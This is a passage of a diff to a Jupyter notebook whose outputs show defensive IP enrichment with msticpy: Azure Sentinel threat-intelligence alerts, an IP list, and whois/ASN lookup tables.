+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>e945f91e-5726-4581-8564-4c04e5414a58</td>\n",
+       "      <td>83a0e08a-1adb-ef75-1c56-f6c9ce25ca69</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:16+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>83a0e08a-1adb-ef75-1c56-f6c9ce25ca69</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 13:53:46+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>a95aaf62-9628-418b-8f5f-0f1f26dcdc13</td>\n",
+       "      <td>fde729f6-674b-997a-17eb-e4e7d2b3690d</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:53:47+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>fde729f6-674b-997a-17eb-e4e7d2b3690d</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId             TimeGenerated  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "3  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "4  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 13:53:46+00:00   \n",
+       "\n",
+       "                          AlertDisplayName  \\\n",
+       "0  Microsoft Threat Intelligence Analytics   \n",
+       "1  Microsoft Threat Intelligence Analytics   \n",
+       "2  Microsoft Threat Intelligence Analytics   \n",
+       "3  Microsoft Threat Intelligence Analytics   \n",
+       "4  Microsoft Threat Intelligence Analytics   \n",
+       "\n",
+       "                                 AlertName Severity  \\\n",
+       "0  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "1  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "2  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "3  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "4  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "\n",
+       "                                                                                           Description  \\\n",
+       "0  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "1  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "2  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "3  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "4  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "\n",
+       "                 ProviderName VendorName  \\\n",
+       "0  Threat Intelligence Alerts  Microsoft   \n",
+       "1  Threat Intelligence Alerts  Microsoft   \n",
+       "2  Threat Intelligence Alerts  Microsoft   \n",
+       "3  Threat Intelligence Alerts  Microsoft   \n",
+       "4  Threat Intelligence Alerts  Microsoft   \n",
+       "\n",
+       "                       VendorOriginalId                         SystemAlertId  \\\n",
+       "0  91d806d3-6b6f-4e5c-a78f-e674d602be51  625ff9af-dddc-0cf8-9d4b-e79067fa2e71   \n",
+       "1  173063c4-10dd-4dd2-9e4f-ec5ed596ec54  c977f904-ab30-d57e-986f-9d6ebf72771b   \n",
+       "2  58b2cda2-11c6-42b8-b6f1-72751cad8f38  9ee547e4-cba1-47d1-e1f9-87247b693a52   \n",
+       "3  e945f91e-5726-4581-8564-4c04e5414a58  83a0e08a-1adb-ef75-1c56-f6c9ce25ca69   \n",
+       "4  a95aaf62-9628-418b-8f5f-0f1f26dcdc13  fde729f6-674b-997a-17eb-e4e7d2b3690d   \n",
+       "\n",
+       "  ResourceId SourceComputerId           AlertType ConfidenceLevel  \\\n",
+       "0                              ThreatIntelligence              83   \n",
+       "1                              ThreatIntelligence              83   \n",
+       "2                              ThreatIntelligence              83   \n",
+       "3                              ThreatIntelligence              83   \n",
+       "4                              ThreatIntelligence              83   \n",
+       "\n",
+       "   ConfidenceScore  IsIncident              StartTimeUtc  \\\n",
+       "0              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "1              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "2              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "3              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "4              NaN       False 2020-12-23 13:48:23+00:00   \n",
+       "\n",
+       "                 EndTimeUtc         ProcessingEndTime RemediationSteps  \\\n",
+       "0 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "1 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "2 2020-12-23 13:48:23+00:00 2020-12-23 14:08:15+00:00                    \n",
+       "3 2020-12-23 13:48:23+00:00 2020-12-23 14:08:16+00:00                    \n",
+       "4 2020-12-23 13:48:23+00:00 2020-12-23 13:53:47+00:00                    \n",
+       "\n",
+       "                                                                                    ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "\n",
+       "                                                                                              Entities  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "\n",
+       "  SourceSystem               WorkspaceSubscriptionId WorkspaceResourceGroup  \\\n",
+       "0    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "1    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "2    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "3    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "4    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "\n",
+       "  ExtendedLinks     ProductName                     ProductComponentName  \\\n",
+       "0                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "1                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "2                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "3                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "4                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "\n",
+       "  AlertLink Status CompromisedEntity  Tactics           Type  \\\n",
+       "0              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "1              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "2              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "3              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "4              New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "\n",
+       "                         SystemAlertId1  \\\n",
+       "0  625ff9af-dddc-0cf8-9d4b-e79067fa2e71   \n",
+       "1  c977f904-ab30-d57e-986f-9d6ebf72771b   \n",
+       "2  9ee547e4-cba1-47d1-e1f9-87247b693a52   \n",
+       "3  83a0e08a-1adb-ef75-1c56-f6c9ce25ca69   \n",
+       "4  fde729f6-674b-997a-17eb-e4e7d2b3690d   \n",
+       "\n",
+       "                                                                                   ExtendedProperties1  \\\n",
+       "0  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...   \n",
+       "\n",
+       "                                                                                             Entities1  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...   \n",
+       "\n",
+       "     MatchingIps  src_row_index  \n",
+       "0  [3.88.48.125]              0  \n",
+       "1  [3.88.48.125]              0  \n",
+       "2  [3.88.48.125]              0  \n",
+       "3  [3.88.48.125]              0  \n",
+       "4  [3.88.48.125]              0  "
+      ]
+     },
+     "execution_count": 56,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(10)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\")\n",
+    ").head(5)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 57,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>192.168.40.32</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>192.168.1.216</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>192.168.153.17</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>10.200.104.20</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>192.168.90.101</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>68</th>\n",
+       "      <td>192.168.150.50</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>69</th>\n",
+       "      <td>172.16.100.31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>70</th>\n",
+       "      <td>192.168.30.189</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>105</th>\n",
+       "      <td>10.100.199.10</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>272</th>\n",
+       "      <td>52.171.57.74</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>273</th>\n",
+       "      <td>52.171.36.115</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>275</th>\n",
+       "      <td>20.84.105.0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>276</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>392</th>\n",
+       "      <td>20.84.112.117</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>397</th>\n",
+       "      <td>192.168.99.137</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>410</th>\n",
+       "      <td>192.168.55.10</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>720</th>\n",
+       "      <td>192.168.51.6</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>923</th>\n",
+       "      <td>104.214.50.229</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>924</th>\n",
+       "      <td>20.51.104.164</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>925</th>\n",
+       "      <td>20.81.40.144</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>926</th>\n",
+       "      <td>20.80.162.44</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>927</th>\n",
+       "      <td>172.31.0.0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>928</th>\n",
+       "      <td>104.215.76.44</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1017</th>\n",
+       "      <td>172.31.0.1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1923</th>\n",
+       "      <td>20.81.42.55</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3290</th>\n",
+       "      <td>20.55.80.232</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4381</th>\n",
+       "      <td>172.16.199.104</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5542</th>\n",
+       "      <td>79.124.62.82</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                  IP\n",
+       "0      192.168.40.32\n",
+       "1      192.168.1.216\n",
+       "2     192.168.153.17\n",
+       "3        3.88.48.125\n",
+       "4      10.200.104.20\n",
+       "17    192.168.90.101\n",
+       "68    192.168.150.50\n",
+       "69     172.16.100.31\n",
+       "70    192.168.30.189\n",
+       "105    10.100.199.10\n",
+       "272     52.171.57.74\n",
+       "273    52.171.36.115\n",
+       "275      20.84.105.0\n",
+       "276     20.55.97.123\n",
+       "392    20.84.112.117\n",
+       "397   192.168.99.137\n",
+       "410    192.168.55.10\n",
+       "720     192.168.51.6\n",
+       "923   104.214.50.229\n",
+       "924    20.51.104.164\n",
+       "925     20.81.40.144\n",
+       "926     20.80.162.44\n",
+       "927       172.31.0.0\n",
+       "928    104.215.76.44\n",
+       "1017      172.31.0.1\n",
+       "1923     20.81.42.55\n",
+       "3290    20.55.80.232\n",
+       "4381  172.16.199.104\n",
+       "5542    79.124.62.82"
+      ]
+     },
+     "execution_count": 57,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ips_df"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 58,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>nir</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>query</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>raw_referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>68</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>69</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>70</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>105</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>272</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>52.160.0.0/11</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-11-24</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>52.171.57.74</td>\n",
+       "      <td>[{'cidr': '52.160.0.0/11, 52.148.0.0/14, 52.152.0.0/13, 52.145.0.0/16, 52.146.0.0/15', 'name': '...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>273</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>52.160.0.0/11</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-11-24</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>52.171.36.115</td>\n",
+       "      <td>[{'cidr': '52.145.0.0/16, 52.146.0.0/15, 52.152.0.0/13, 52.160.0.0/11, 52.148.0.0/14', 'name': '...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>275</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.64.0.0/10</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.84.105.0</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>276</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>392</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.64.0.0/10</td>\n",
+       "      <td>US</td>\n",
